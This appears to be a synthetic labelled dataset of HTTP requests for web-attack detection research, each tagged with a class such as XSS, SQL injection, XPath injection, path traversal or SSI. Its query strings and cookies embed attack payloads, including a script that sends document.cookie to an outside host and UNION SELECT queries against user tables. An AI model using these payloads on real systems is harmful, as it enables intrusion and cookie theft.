MIME-Version: 4.3
Pragma: T=6hHjaal
Proxy-Authorization: NTLM YTlha3RlZjlua29weWVzb2s3MW5yemFoMm5wbk4waVJzZW9ndG4zTGhpOGh0aQ==
Authorization: NTLM aGN6aTVpd3RycnFzdGJvaHN0MnVqc2xpZ25hYWVkZm9saw==
Range: 70-
Referer: /tvtmslh/ecgg1p/eaunttss.asmx
TE: deflate
Trailer: Date
User-Agent: geNy81SrZ http://www.enne.cz
UA-CPU: x86
UA-Disp: 224,424,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1501x189
Via: 5.3 201.253.147.38, hGpre/8.3 207.50.65.250
Transfer-Encoding: gzip
Upgrade: 8sjta/1.7, OaiEm/9.0
Warning: 552 www.5qeog.tiff "0tt4tuzwrsgn" 
X-Forwarded-For: 2.74.16.0
X-Serial-Number: 008751
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 44107
Start - Id: 47091
class: XSS
GET /tS9YzKgI/eWNvGG8NnYmUpGc.tiff?vEn=mt&ieaetebzrate2tv=nopassthruAni%3Fndrd%7CrsthRehaving&lAyWMevalt9oLYj=%5B%5CxC0%5D%5B%5CxBC%5Dscript++++%3E%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.atalisng.com%2Fcgi-bin%2Fna.cgi%27%2Bdocument.cookie%29%3B%5D%5B%5CxC0%5D%5B%5CxBC%5D%2Fscript+%3E&62t=6947&iTehe=60746&emrI=%7Eformoe&rxJEt=s%5C+Eauyk1b%29erilt&X51H=c4sbew5 HTTP/1.1
Host: 205.136.11.188:4
Connection: keep-alive
Accept: application/*;q=0.1
Accept-Charset: windows-1252, iso-8859-3;q=0.0, euc-tw;q=0.6
Accept-Encoding: compress, compress, identity
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 4.100.87.145
Cookie: aS7z9=r(oeaiametaR v?ueyid 
Cookie2: $Version="958"
Date: Sun, 26 Apr 09 12:36:54 GMT
ETag: W/"EhunCWQ4o1C.J05jFTu"
Expect: 100-continue
From: he45tlh@5ely.uk
If-Modified-Since: Wed, 16 Jun 04 06:03:19 CET
If-Unmodified-Since: Fri, 05 Mar 10 19:24:46 GMT
If-Match: *
If-None-Match: "V9.i.iQXnMQ7R7p"
If-Range: Mon, 06 Nov 06 18:40:39 UTC
Max-Forwards: 31
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: aos2 yryvu=gt6dn
Authorization: Basic YWVkZWYzOm5laGFldA==
Range: 8087-45811,698738-8731
Referer: /6w1la/c1ecvsre/aTtos.tar
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: s1hdpmnSe (tZeYDK0r4; ncvhW.ilW.)
UA-CPU: Sparc
UA-Disp: 016,6175,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 320x898
Via: HTTP/4.9 www.ioUbio.gif, 6obt/3.3 211.151.240.74
Transfer-Encoding: deflate
Upgrade: mwcnt/9.8, Dizwoq/2.8, rtnuoa/0.5
Warning: 897 220.57.2.222 "rztAtEb" "Sun, 09 Aug 09 20:51:13 CET"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 60697232
----: ------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 47091
Start - Id: 49200
class: XPathInjection
GET /tx8XO5CW7vzJNKS@qCG/rckeoeuQh9er/iZ9u1-XGKUHNkHEH6bE/so0tD/rheosuvwrse/t6rZuA0wI_CfEC/osLn6d/stssoretihplyYcef4sh/7a.swf?gOeumtru=rhIm%27++or+++e%2Fvtsn7t%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D106%5D++++or++++%27zNltmziw%27+%3D%27 HTTP/1.0
Host: 80.237.9.136
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: bc-rnrnmte4
Cache-Control: bcf=emnjotc
Client-ip: 254.208.202.91
Cookie: jw1sHSNchild=st;rdkde=iy;rwteh1aeuen=mror;JhtpassPD=nSelreemorcanrptSn
Cookie2: $Version="0"
Date: Sun, 08 Jun 08 17:04:42 UTC
ETag: "ruPgw4wQy@KHv4cvV"
Expect: wlenof
From: Gswzt6t2@seem.gov
If-Modified-Since: Fri, 30 Jan 09 24:50:27 GMT
If-Unmodified-Since: Wed, 18 Mar 09 20:38:55 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 15 Nov 08 06:20:50 GMT
Max-Forwards: 3013
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM c2FoaU9qc3RsdG9uY2VodDg3a2Z4U3NsYWJpaWVhNTZ0bmVzb2g=
Authorization: Digest nonce
Range: 943272-69165,-532,868-6
Referer: /ece0/ii0uqn/rUiloien.tiff
TE: trailers
Trailer: Authorization
User-Agent: hotnyn (aN2O6i4.kn; eb-a8t; c.zt3Ltq; k.uvUV)
UA-CPU: MIPS
UA-Disp: 344,403,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 6245x946
Via: Sjny/2.4 www.qdo1tot.gif
Transfer-Encoding: compress
Upgrade: wtrfa/2.8, tto/9.5, nvs/5.2
Warning: 143 221.24.90.70:6149 "atInyfjon" 
X-Forwarded-For: 19.241.14.123
X-Serial-Number: 094897870
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49200
Start - Id: 49684
class: XPathInjection
GET /o9pbzpA.zLMPg/nXX0wtjc0rz_/spG9WHQNlDQUPg5cP0.msf?lbfsTsnac=ece&tdlrm6oid=7862+++++or+1%3C+++++si4em%2F2l6p%2Fiaas2%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D39%5D+++++or++4719%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&bdnoP=iu5&aataytwstr=rxanuslnboAmailRtt&9aieind=xitc HTTP/1.0
Host: 210.193.206.189:80
Connection: laniaU
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 81.28.43.223
Cookie: Kaccess_logXrGch=anvahodb7cnme;rr=24500319;efnaesHoc=9685;thag=u;
Cookie2: $Version="176"
Date: Fri, 16 Apr 10 17:58:14 UTC
ETag: "kEZV4g66j0qldaMaD"
Expect: 100-continue
From: earb@naiA.org
If-Modified-Since: Tue, 24 Jul 07 12:56:21 UTC
If-Unmodified-Since: Fri, 18 Jul 08 02:13:36 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 81
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: NTLM b2RuZWV0bGVubm5nb2huU3diYWZibW9uc3BlRHp2dG1jYXdiZWNsM0FlNXM=
Authorization: sdle meWstur=sniaulb
Range: -09
Referer: /tSoices.wmn
TE: trailers,chunked,trailers
Trailer: Range
User-Agent: Mozilla/7.7 (X11; U; Open BSD i386 0.5; tg-re; rv:9.1.8) Gecko/98791870
UA-CPU: Sparc
UA-Disp: 8272,159,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5244x685
Via: 8.3 134.199.183.150:152
Transfer-Encoding: gzip
Upgrade: reeei/0.0, w2wde/2.4, e58a/5.6
Warning: 928 www.sea4hf7.png:6529 "guetn6bIulNebhuhnEd" "Fri, 08 Apr 05 24:10:56 UTC"
X-Forwarded-For: 76.177.20.101
X-Serial-Number: 7269529706090781
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49684
Start - Id: 47106
class: XSS
GET /hUetneyfaxisn/nD2tpnloANtne9/doWpliyon.cfm?nox6ahotrI=96663297&t2Seogei=629655836&ithsotqsn=ttnany&reie1imsaeor=tOmAud&.include1N=at4ct2eic&php6pUjyXE0aDK=-&AizRRetro=%3Cdiv++++onmouseover+++%3D++++%22+++%5Balert++%28%27eoiq%27%29%3B%5D+++%22++++%3E&tbh=zT4n7&8esma1eSgeF=r0beeaDhk2YsluTh&TptCa=g7oean&dnoa=ia%29o%40o%24e%28r%3Dypat+eo HTTP/1.0
Host: 187.46.12.97:9766
Connection: close
Accept: video/*, text/*;q=0.3, audio/x-wav;q=0.9
Accept-Charset: windows-1250, windows-1255, iso-8859-15;q=0.8
Accept-Encoding: compress, deflate;q=0.3, gzip
Accept-Language: oyr014a-mofuC;q=0.0, aWuawo-eizn;q=0.4
Cache-Control: no-transform
Client-ip: 7.50.56.44
Cookie: tet2SGw=t3-28-x7ToX;dhdscieeF2rt=thh
Cookie2: $Version="1"
Date: Mon, 06 Nov 06 04:18:08 GMT
ETag: W/"0k_Eh5QzzVf7sgiEF"
Expect: c5e7h=tt0St
From: Srtniim@ss0iltolEd.ch
If-Modified-Since: Sat, 11 Apr 09 06:35:13 GMT
If-Unmodified-Since: Mon, 06 Sep 04 18:16:09 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 7.9
Pragma: i=ti
Proxy-Authorization: NTLM bXI4YTU4YmF1b3RvaW90YXlMNTNubXFlZmVsYXNQcmVtY29hdHJpdEU=
Authorization: oe4a amnodaeh=arnnl
Range: 74-7756,9-
Referer: http://Dgwa.be/17eE/a0dj/oaeama/tzjt/AbR9ae.php
TE: trailers,trailers,trailers
Trailer: Connection
User-Agent: 2aoEnf (zsvVLz; 0cOsRo; iSSxofXCY)
UA-CPU: StrongARM
UA-Disp: 016,6175,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 2605x6191
Via: 6.6 www.rssuts1e.shtml:9459, FTP/9.5 www.0oge5e.tiff:14252, 6.7 www.yCieRsrR.tiff
Transfer-Encoding: deflate
Upgrade: mnyt/9.5
Warning: 241 140.186.56.188 "eynAOe7ebztnrt" 
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 236782108
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47106
Start - Id: 48061
class: XSS
GET /Rl9/1-TM9/tC0V8XkSZS4KXNLJRE/finsert0Q/tairAue/rTutubaOeh/e3oE-8./inlalaeeai9e/mry6L52smMwTaH/kONQmxkHBiqQOOeX/QC.exe?Mwsd9hlSet=e%7C81os8&eNWbYVV=168&lqictincoarqadT=%3Cinput++type++%3D++%22+image++++%22++dynsrc%3D%22+++javascript%3A%5Balert++++%28%27na%27%29%3B%5D%22+++%3E&4odropmailF=2&norohr0nMayo=kltasnxp_+0aOE&Enw7ysC=m%40EGEv&ra9_fmTH@m=sBx.jZR632&trtnlcp=562948&auangtUltdnih=1805&eioeane=Stk5iglapnsnl&UuR0HMj=aUdgeEitbl&ffnoen=eBbi6o HTTP/1.1
Host: 94.19.165.42
Connection: close
Accept: text/*;q=0.9, image/*;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: deflate
Accept-Language: en-5, aaetfe6e-cti;q=0.4, eddrrefd-r3hw;q=0.8, edIthht-NhcKuii;q=0.4, efien-pji;q=0.8
Cache-Control: no-cache
Client-ip: 168.194.28.89
Cookie: 6b5br= ya;bhoinT=758722;oramnaaH=91022;osbO=0764012
Cookie2: $Version="9"
Date: Fri, 09 Jan 04 05:04:16 CET
ETag: W/"@AY44BLRCYw-DcLtsp"
Expect: niHibO
If-Modified-Since: Wed, 12 Jul 06 16:50:46 UTC
If-Unmodified-Since: Thu, 04 Oct 07 22:37:15 CET
If-Match: *
If-None-Match: "ujYppgRdyKdA8r9"
If-Range: *
Max-Forwards: 5451
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: Yean xazroh=heTobre
Authorization: sedh aaieeArs=mnoE
Referer: /osMm/ksnir2hb/aont.css
Trailer: Warning
User-Agent: nmoEL7/3.7.7
UA-CPU: PowerPC
UA-Pixels: 8331x5573
Via: 7.1 105.72.64.241, HTTP/1.5 199.255.104.234
Transfer-Encoding: 5Clt
Upgrade: edtthr/9.5, Yast/6.8, ti2epi/5.7, tgb0/4.2
Warning: 634 www.yauedif.css:99300 "eQn3Xdra5ghbItoas" 

null

End - Id: 48061
Start - Id: 47942
class: XSS
GET /S.vd4W/erhz/yayH/iSCIH/_2xtermbK/be/ld3Xvt4imINAerl/lBZ.3E910aZvy.jsp?oAkIPbody0R=%3C%21--+--+--%3E%3Cscript+++%3E%5Balert+++%28%27o7tite%27%29%3B%5D%3C%2Fscript+++%3E%3C%21--+--+--%3E HTTP/1.0
Host: 227.26.114.169
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-cache
Client-ip: 55.58.52.249
Cookie: nost0n=:eew;4Air6os=) wn[orrzstront
Cookie2: $Version="16"
Date: Sat, 23 May 09 11:48:09 CET
ETag: "ftjXL.qa9aDa_vAZ2I5K"
Expect: nrmash=oeIs4neR;etmomp=ogtht
From: Eawmtren@tifsCoeGen.net
If-Modified-Since: Wed, 08 Nov 06 17:51:17 GMT
If-Unmodified-Since: Thu, 30 Nov 06 09:40:01 CET
If-Match: "_@TaipZZGQ5OuW1tZM"
If-None-Match: *
If-Range: Tue, 04 Mar 08 04:52:56 UTC
Max-Forwards: 8401
MIME-Version: 2.0
Pragma: 0ieesmi='eer1'
Proxy-Authorization: Digest response="D2c62646bFC00e6b27eFfb05278ad0eb"
Authorization: NTLM Q2J0c25nczVSb2VMb3NvdHJkOHJpTkUzZWVwYXRlaUM5b3Nub3ZvdQ==
Range: 44-,8-
Referer: /pexrdoaT/jKtni.mspx
TE: gzip
Trailer: Max-Forwards
User-Agent: Mozilla/4.9 (compatible; Konqueror/7.7; Windows NT; W3tehu; xod9; oaeeknnW)
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 7476x522
Via: FTP/4.0 149.105.135.90, 0.7 164.104.37.26:6744, 6.4 223.146.211.255:59505
Transfer-Encoding: compress
Upgrade: cho/4.7, fss/8.0, m4ety/0.5, r4gd/1.6
Warning: 608 117.63.178.23 "ioeihi" 
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 99981818426626
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47942
Start - Id: 44913
class: PathTransversal
GET /betweena.Gf5sock_streamWHJfyLF/xmT37gkKmeoOq.html?oieeYcraen=%3F&hI0pnho=n&zLXOsulinkM_homeaw=190&ou=yxzKC1US&Sw6LvH=e5rhtY&gsL1oi8f8pexuab=4&zit9rz=eH4mkVhk&eesa=ei%2F5%3A&Nr=doc%28+file%3A%2F%2F%2Fc%3A%2FistcP%2FEE2ism.xml++++%29&o5oeidhctutat=4 HTTP/1.1
Host: 57.3.176.176:80
Connection: keep-alive
Accept: text/xml;q=0.8, video/*;q=0.8, image/*;q=0.6
Accept-Charset: *
Accept-Encoding: identity, identity;q=0.3, deflate;q=0.3
Accept-Language: eRNL-helEr;q=0.1
Cache-Control: t=rsi2rtsc
Client-ip: 117.77.195.37
Cookie: eBntre9n=760665;lpctdooa4aTm=eRh;notogeylklsOth=6593;cHwsao0iietak=dinputitmpf;Huqeahmdociyi=54
Cookie2: $Version="49"
Date: Wed, 21 Mar 07 04:57:30 CET
ETag: W/"iCGvu6NLpR4V-_o2.e"
Expect: zttec7
From: ossdo1d@eovryuBei.be
If-Modified-Since: Wed, 09 Mar 05 24:20:40 CET
If-Unmodified-Since: Tue, 14 Jul 09 03:46:41 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 391
MIME-Version: 0.6
Pragma: t='xn3a'
Proxy-Authorization: Basic ZUVpejZkbm06ZlhjM2ht
Authorization: oaed reost=IubiEni
Range: 50635-77
Referer: http://www.nunml.it/taideto/pqE0/vlioor.swf
TE: trailers,gzip;q=0.5
Trailer: Accept-Encoding
User-Agent: 3pl9bda8 (aBDmW2)
UA-CPU: StrongARM
UA-Disp: 2288,5387,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 6797x3315
Via: FTP/5.8 207.104.136.242:6, emEate/3.5 193.243.86.99, 0.5 213.49.248.186
Transfer-Encoding: compress
Upgrade: hrs2so/5.1, hiaaa/2.1, n3bee/7.6, irnbn/8.7
Warning: 988 www.oihee.jpg:20 "etxoOiolmnofnnjob1c" "Mon, 09 Mar 09 19:24:20 CET"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 44913
Start - Id: 42563
class: SqlInjection
GET /as0EkGMKz/eronsosk2eoeheb/l5-N_Uugd/yhN-D/vGoaZLq.gif?sn9iyekbshuulee=6e0minlhorfu&52=5501372&isbloa2f7d=%27+++%29+UNION++++ALL+SELECT+++5%2C9022%2C96%2C74%2C4743+++++FROM+++++ovxi5+++++WHERE++%28%27%27+%3D%27&tTniiwaldahTy=eb%406b2&dtUezean9raea=texecsrrnm%2B1sn&kcamNn=rf%5D&ihshFlg=-%3Bdu%25ioo&f9thj=0eicW+&enph-SVCF5NWp=r3t&tst=87073623&ctrco6hee0fier=rsuji&es8pPh83ztsni=211644908&jEghaRl49bbt=iy83GqAbvQ&nanetrss=lcd&ho=h HTTP/1.1
Host: 124.37.117.136
Connection: rpfx
Accept: audio/x-wav;q=0.2, application/*
Accept-Charset: iso-8859-4;q=0.5, windows-1250;q=0.5, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=2262
Client-ip: 221.121.37.212
Cookie: QotiEaOctra9dm=eZisZOD91FKC;H7u9oshensttn7=?t;qemo1toeont=23479614;6eterE=552
Cookie2: $Version="79"
Date: Wed, 15 Jun 05 19:26:39 CET
ETag: "TraGuu_QjplOnZR"
Expect: shrot
From: spods@kyeiscew.net
If-Modified-Since: Sun, 17 Aug 08 15:50:10 UTC
If-Unmodified-Since: Fri, 20 Jul 07 07:24:16 CET
If-Match: *
If-None-Match: "_KbjtWBMwwQAIu-xBqA"
If-Range: Thu, 03 Sep 09 22:22:36 GMT
Max-Forwards: 6101
MIME-Version: 8.8
Pragma: ii='6EaE'
Proxy-Authorization: Basic b2VsbjY6T2hUZ2Vv
Authorization: Basic ZHh5Vjphb01zaw==
Range: -05,8037-,228664-
Referer: /Urrgtssn.asmx
TE: chunked,trailers,gzip;q=0.6
Trailer: Expect
User-Agent: Mozilla/7.2 (Windows; U; Windows NT 6.8; ts-qo; rv:6.3.6) Gecko/99467185
UA-CPU: MIPS
UA-Disp: 1891,2562,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 161x8196
Via: 1.4 www.tia5.png, 3.9 86.206.223.109, 0.3 www.nbhamA.js
Transfer-Encoding: compress
Upgrade: idlsll/7.2
Warning: 932 195.72.254.121:53 "lnpgreue" "Fri, 16 Oct 09 14:01:22 GMT"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 14019668167016941
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42563
Start - Id: 35177
class: SqlInjection
GET /fzv/hyneupelq5/eenc-1EzngC/oh3kdoq.bVUDxDF/e_Lz0B.32BDYEKo/pIvGEkQi1Oj5X/nvnN77Af/9IJy8Xk9AjTnha0/rGnb/YHXgroup byzN969in75.gif?spvlnb7lt=au1i5su3iiee&ndtt2TOgatev=atras%2Bdeletemtncreadunionp%3Bpoe&ZzwyN=nvedjekptreNe8nA&cIT3Enj6@c=ohttpsat&okgqamio=+f&oQthtttetdae=++++OR+++2++++%3E++++1&tsu9mz=nV.i&ouHdEUr0ttoxig=6yFU_&hoKmtLn=er&5ktMeihnoac1ves=oservicesro&uktvzlu3n=kah&ldnrp3e5Rof=h6o&essrt=tpBvKs9&eincSgjv=E HTTP/1.0
Host: www.rdEdkev.fr
Connection: eeSk
Accept: audio/*;q=0.0, text/*;q=0.8, video/*;q=0.5
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 217.183.190.184
Cookie: Nbrxtstoutdc1ad=51470
Cookie2: $Version="835"
Date: Fri, 02 Mar 07 21:35:40 CET
ETag: "WokkLc._JOvblYu"
Expect: itEV
From: as5oeh@nl7ehee.ch
If-Modified-Since: Fri, 12 Jan 07 14:37:21 CET
If-Unmodified-Since: Wed, 08 Nov 06 09:36:44 UTC
If-Match: "KJjx2tr1ocariw4dVxfc"
If-None-Match: *
If-Range: "9eUBfCLNRqg.3f7-Q47D"
Max-Forwards: 061
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: ortr bdoanD=ot23oe
Authorization: Basic ZXA5SW9BbDp0c214c3VldA==
Range: -619874,-90
Referer: http://etewls.net/eeeN1wO0/Aepxlh/IYrg.gif
TE: deflate;q=0.9
Trailer: From
User-Agent: 8_5--Fk http://www.moLgsj.be
UA-CPU: StrongARM
UA-Disp: 571,0582,16
Via: 2.7 69.209.232.196, 7.3 48.195.98.142, 5.5 www.6cno.css
Transfer-Encoding: identity
Warning: 749 www.DeYsfD6.gif:90 "Albacnauthecopstseao" "Mon, 14 Feb 05 18:04:54 CET"
X-Forwarded-For: 74.88.12.154
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35177
Start - Id: 42658
class: SqlInjection
GET /if9B/xm9jVEYtBXWG.mspx?NgTcep=chairs%27++++UNION++++SELECT++um8ede+++FROM+dba_users+++WHERE+name+++like++%27%2525&ogt1gia=mFem&OTZidN=8415&et2hpdor=58&17aaj5.W0wyr=%7Csnpe%3A&e9hsssxs=9-tien%5CadneEl&ftt0l1=cSDrh&ntirsnidchts=76&sI_Qp=2&LHeancoee8=eemfxr&apk=5205286&r7oatgoyuna=1174&fczro=atnilrno HTTP/1.1
Host: www.satPIoRitk.fr
Connection: keep-alive
Accept: application/postscript
Accept-Charset: *
Accept-Encoding: identity;q=0.9, identity;q=0.7, gzip, identity;q=0.2
Accept-Language: ariysatg-enr7esti, y5iisop-1Ye;q=0.2
Cache-Control: max-age=9
Client-ip: 146.94.72.186
Cookie: qq1ha2ftaaao=8229;z1EMR=i6OEP.2uc;ehO=9;rubdaonj9ojgp=ijaunsop~jttni
Cookie2: $Version="5"
Date: Thu, 14 Jun 07 01:43:14 CET
ETag: W/"H.QakKmPwd7ntHNPLq"
Expect: 100-continue
From: ioetrdEh@laes.com
If-Modified-Since: Fri, 12 Oct 07 06:25:38 CET
If-Unmodified-Since: Wed, 26 Jul 06 05:27:54 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 01 Aug 05 11:47:10 GMT
Max-Forwards: 1
MIME-Version: 1.9
Pragma: ab5t='aektbUou'
Proxy-Authorization: NTLM bW9tc2VkRWh1Y21SbnRPbmJ0ZUNhZXllVGVoMm9lbHRQZ3Vt
Authorization: NTLM YmRlaGVqSG5rYTlpc29yYXNkYXNkSW5FaDJsNmVlbXBvanBlcmlBeW5jbnNnemNl
Range: 339-5245,-077063
Referer: /sgqes/7alef/Nmro.txt
TE: deflate,trailers,trailers
Trailer: Accept-Charset
User-Agent: tu0tk/7.7.7.0.1
UA-CPU: PowerPC
UA-Disp: 0660,7144,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 4720x346
Via: HTTP/4.6 www.tdmz.tiff, 7.2 www.1yntgg.png, FTP/2.8 www.d7rtnh.htm
Transfer-Encoding: deflate
Upgrade: ahhfl/7.8, chtwm/6.2
Warning: 058 www.Yai0bEs.jpg "ftaksn6eorlykneo" 
X-Forwarded-For: 153.138.91.160
X-Serial-Number: 69822179
----: -----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 42658
Start - Id: 40863
class: SSI
GET /kHJd5gd2G._LVtelnetu/wi5rdn8layodtt/eocrnaECyhrtyoa5zvs/hgzcu7Mof8rudrre8eqe/leGeatpeptcs/ecTho5rOrotS1aiitQw/scriptlocationwFGheplq2/FMS9gDM.cy.jpg?tdddmaprn=tenhenena&M1jz4f@bh=tv2JfNkH&htpwu=nxW&dhttpyF-H2XJ@bin7=9427&isu8ecllhneayee=%3C%21--+%23odbc+connect%3D%229e%2Ced%2Cno5sm%22++++++++statement%3D%22select+++++*+++from++++rca%22--%3E&ioeniE=o+4%2B%2Be&atwAsbiy=iaerncntdtnml&odte=lehty&teaenqa=sgFqUIwaetMR&4pcavq=6382579 HTTP/1.1
Host: www.ntunmekpe.gov
Connection: keep-alive
Accept: application/zip;q=0.5, application/x-tar;q=0.5, audio/*
Accept-Charset: iso-8859-5, iso-8859-8-i;q=0.6, iso-8859-4, cp-932, iso-8859-15;q=0.0
Accept-Encoding: compress;q=0.5
Accept-Language: 5e5uecrs-alnz5gJ, uw49ly-a, FiR8nW-vvatpn;q=0.4, o-raehy9
Cache-Control: max-stale
Client-ip: 79.196.34.113
Cookie: 7rshoit5muZn07=0064384;Na=tm3rM2;niu=a inputjoifi5wB
Cookie2: $Version="380"
Date: Thu, 30 Jul 09 22:08:39 UTC
ETag: W/"gKFKCK8J1NgSl7Jt"
Expect: ahutgh=Zrti
From: xhslhnd@1eneubz.it
If-Modified-Since: Fri, 13 May 05 10:08:37 GMT
If-Unmodified-Since: Sun, 20 Feb 05 12:10:41 GMT
If-Match: "J9xuKGeW0UoA1a74"
If-None-Match: *
If-Range: "LVPH1NkG@4g7F9t5qiG-"
Max-Forwards: 01
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: dNre ae1tadjl=gqbi
Authorization: Basic ZmVsb2Vtcjpuc3NlZWVhbA==
Range: 982-719379,-7604
Referer: /neipn.msf
TE: gzip;q=0.5,trailers
Trailer: Upgrade
User-Agent: Mozilla/1.2 (compatible; Konqueror/4.1; SunOS sun4u; seJzpO; sqdswesm; haeoeaka)
UA-CPU: x86
UA-Disp: 998,969,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 5993x410
Via: 5.4 161.243.89.169:47, 2.9 www.nedo7.tiff, 5.8 www.ieiEl6e.css
Transfer-Encoding: gzip
Upgrade: saht/3.7, 9sha/5.8, Eossd/8.6, rms/3.5
Warning: 063 170.129.30.215:3080 "tttenlbdte1UerRsne1h" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 49586702317462
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40863
Start - Id: 35480
class: XPathInjection
GET /nUegN_96R/sZui@B-bLb/lsonoipsetiebo/ad6tespb.gif? HTTP/1.1
Host: www.ou7ntt3loc.de
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-greek;q=0.0, hz-gb-2312
Accept-Encoding: isnbsl/ocA7d/e/child::node()[position()=780] or   'emAnont'=    '
Accept-Language: *;q=0.7
Cache-Control: no-cache
Cookie2: $Version="59"
Date: Sat, 02 Oct 04 13:14:55 CET
ETag: "Gl6oIwNlvdG98J9"
Expect: 100-continue
From: ngfFicn@0elde0.it
If-Unmodified-Since: Tue, 15 Aug 06 17:49:12 CET
If-Match: *
If-None-Match: "Uo7AJuE8D90Slf@wTq"
If-Range: Sun, 07 Dec 08 22:43:59 CET
Max-Forwards: 295
Pragma: no-cache
Proxy-Authorization: NTLM bm9yYW1pZWlpaXVldnJ0aWF1b2NydE50d2w2dHVuZG91SHJlaWhhcEs=
Range: 989336-,-2,-278466
Referer: http://eee3.gov/sbldow/r8iaasE/Hdtfie9/aSimit/PEcg2.jsp
TE: gzip
User-Agent: Mozilla/9.0 (Machintosh; U; PPC 7.2; pN-hr; rv:0.5.2) Gecko/79102510
UA-Disp: 0547,432,32
Via: 5.7 www.sey0.gif:2, 3.4 www.etet.jpeg, FTP/9.2 www.zaAieiiq.html
Transfer-Encoding: gzip
X-Forwarded-For: 156.158.202.82
----: -------------------------------------------

null

End - Id: 35480
Start - Id: 41310
class: SqlInjection
GET /bo_fejl1hQd-p3cq_IC/W9.cgi?2CpositionSI9YQYk=r%7C&aShk=eOPwL&2bosot=%24processing-instructionae%5C5&gkNy2awnsanei=uCMsYCV HTTP/1.1
Host: 248.0.140.237:80
Connection: close
Accept: text/xml, application/*;q=0.8
Accept-Charset: shift_jis, iso-8859-1;q=0.0, x-mac-chinesetrad, windows-874
Accept-Encoding: *;q=0.6
Accept-Language: yesrpo-P
Cache-Control: max-stale=5114
Client-ip: 70.57.112.146
Cookie: etDnuite=143;NYwuAaei='UNIONALLSELECTfieldFROMmetindsendWHERE'' =  '
Cookie2: $Version="830"
Date: Wed, 20 Jun 07 02:27:49 CET
Expect: 100-continue
From: ueaeFah@isedattkdk.be
If-Modified-Since: Thu, 02 Mar 06 17:39:44 CET
If-Unmodified-Since: Fri, 01 Oct 04 15:21:24 GMT
If-Match: "phNdOK6XvC.xxXVAXY"
If-None-Match: "JL3AbqFeCvdXD4_V-5"
If-Range: Fri, 11 Dec 09 13:02:14 GMT
Max-Forwards: 40
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest nc=Eceb3D18
Authorization: Digest qop=auth
Range: 3-1402,-33161,6-385
Referer: /m8zb/ejdqYtHi/oihy53/i7zr.png
TE: trailers,deflate,gzip;q=0.0
User-Agent: Mozilla/1.7 (Machintosh; U; Mac OS X 5.8; pd-qa; rv:2.6.2) Gecko/53230070
UA-Disp: 925,428,8
UA-Color: color16
UA-Pixels: 187x5335
Via: HTTP/6.5 155.207.28.167
Transfer-Encoding: compress
Upgrade: nnsM/5.9, mwhnm/2.8, c99rl/3.1, eihsFs/6.2
Warning: 506 www.ahaarsa.jpg "smnu" 
X-Forwarded-For: 139.28.183.159
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 41310
Start - Id: 42157
class: SqlInjection
